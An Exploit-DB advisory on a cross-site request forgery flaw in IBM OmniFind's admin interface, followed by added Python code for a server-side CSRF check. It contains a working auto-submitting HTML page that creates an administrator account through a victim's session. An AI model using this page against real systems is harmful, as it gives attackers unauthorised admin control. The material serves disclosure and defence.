Source: exploit-db, EDB-ID: 15473
Author: Fatih Kilic
Published: Nov 09, 2010

IBM OmniFind - Cross-Site Request Forgery

Origin: www.exploit-db.com

AI Score: 7.4 (Confidence: Low)

The forms in the administrator interface are not protected against XSRF (cross-site request forgery). An attacker can therefore perform any administrative action in the context of a logged-in victim.

An example attack scenario: the attacker creates a malicious website containing a prepared form that adds a new user; the form is submitted automatically when the page loads, and the victim's browser sends it together with the victim's existing administrator session.


Exploit to add an admin user:
<html>
  <head><title>Some seemingly benign web-site</title></head>
  <body onLoad="document.forms[0].submit();">

    <form method="post"
          action="http://omnifind-host/ESAdmin/security.do">
      <input type="hidden" name="command" value="saveNewUser"/>
      <input type="hidden" name="user.name" value="joemueller"/>
      <input type="hidden" name="user.role" value="0"/>
      <input type="hidden" name="user.allCollections" value="true"/>
      <input type="hidden" name="apply" value="OK"/>
    </form>
  </body>
</html>
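The fix on the server side is the check the advisory says is missing: the admin form handler must reject a POST that does not come from its own origin and does not carry a per-session anti-forgery token. The following Python is an added defensive example written for this page, not code from the advisory or from IBM OmniFind. The field name `csrf_token`, the allowed origin `http://omnifind-host`, the attacker origin `attacker.example`, the cookie value and the request/session dictionaries are all constructed assumptions; the form fields themselves are the ones the exploit above submits. It runs the forged submission from the exploit page, the same submission without any `Origin`/`Referer` header (as an older browser might send it), and a legitimate same-origin submission through one `check_csrf` function and shows which are rejected and why.

```python
import hmac
import secrets
from typing import Optional
from urllib.parse import urlsplit

# Constructed example added to this page (not part of the advisory): a
# server-side CSRF check for an admin form handler such as the one the
# exploit above posts to. Origin, field and header names are assumptions.

ALLOWED_ORIGIN = "http://omnifind-host"   # origin of the admin UI (assumed)
TOKEN_FIELD = "csrf_token"                # hidden form field name (assumed)


def issue_csrf_token(session: dict) -> str:
    """Create a per-session synchronizer token and store it server-side."""
    token = secrets.token_urlsafe(32)
    session[TOKEN_FIELD] = token
    return token


def source_origin(headers: dict) -> Optional[str]:
    """Best-effort source origin: Origin header, else scheme://host of Referer."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def check_csrf(request: dict, session: dict) -> tuple:
    """Return (accepted, reason) for a state-changing request.

    Two independent checks: the request must come from our own origin
    wherever the browser tells us where it came from, and it must carry
    the token stored in the victim's session, which a cross-site page
    cannot read. The token check is what still protects us when the
    browser sends neither Origin nor Referer.
    """
    if request["method"].upper() != "POST":
        return False, "state change must use POST"

    origin = source_origin(request.get("headers", {}))
    if origin is not None and origin != ALLOWED_ORIGIN:
        return False, f"cross-origin request from {origin}"

    expected = session.get(TOKEN_FIELD)
    supplied = request.get("form", {}).get(TOKEN_FIELD)
    if not expected or not supplied:
        return False, "missing CSRF token"
    # constant-time comparison so the token cannot be guessed byte by byte
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "CSRF token mismatch"
    return True, "ok"


# --- constructed sample requests (cookie value is a placeholder) -----------

victim_session = {"user": "admin"}          # the victim's authenticated session
token = issue_csrf_token(victim_session)    # token embedded in the real admin form

# The fields the exploit page above submits.
NEW_USER_FORM = {
    "command": "saveNewUser",
    "user.name": "joemueller",
    "user.role": "0",
    "user.allCollections": "true",
    "apply": "OK",
}

# 1. Forged POST from the attacker's page: the browser attaches the victim's
#    cookie, but the Origin is the attacker's site and no token is present.
forged_request = {
    "method": "POST",
    "headers": {"Origin": "http://attacker.example", "Cookie": "JSESSIONID=<victim>"},
    "form": dict(NEW_USER_FORM),
}

# 2. Same forged POST from a browser that sends no Origin/Referer at all.
forged_no_origin = {
    "method": "POST",
    "headers": {"Cookie": "JSESSIONID=<victim>"},
    "form": dict(NEW_USER_FORM),
}

# 3. The same form submitted legitimately from the admin UI, with the token.
legit_request = {
    "method": "POST",
    "headers": {"Origin": ALLOWED_ORIGIN, "Cookie": "JSESSIONID=<victim>"},
    "form": {**NEW_USER_FORM, TOKEN_FIELD: token},
}


def demo() -> dict:
    """Run all three sample requests through the check."""
    return {
        "forged": check_csrf(forged_request, victim_session),
        "forged_no_origin": check_csrf(forged_no_origin, victim_session),
        "legit": check_csrf(legit_request, victim_session),
    }


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print(f"{name}: {'accepted' if ok else 'rejected'} ({why})")
```

Both checks are kept on purpose: an `Origin`/`Referer` check alone fails open for clients that omit those headers, and a token alone gives no signal in the logs about where a rejected request came from. Rejections from `check_csrf` are also a useful detection source, since a burst of "cross-origin request" rejections against `security.do` is exactly what this attack looks like from the server.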
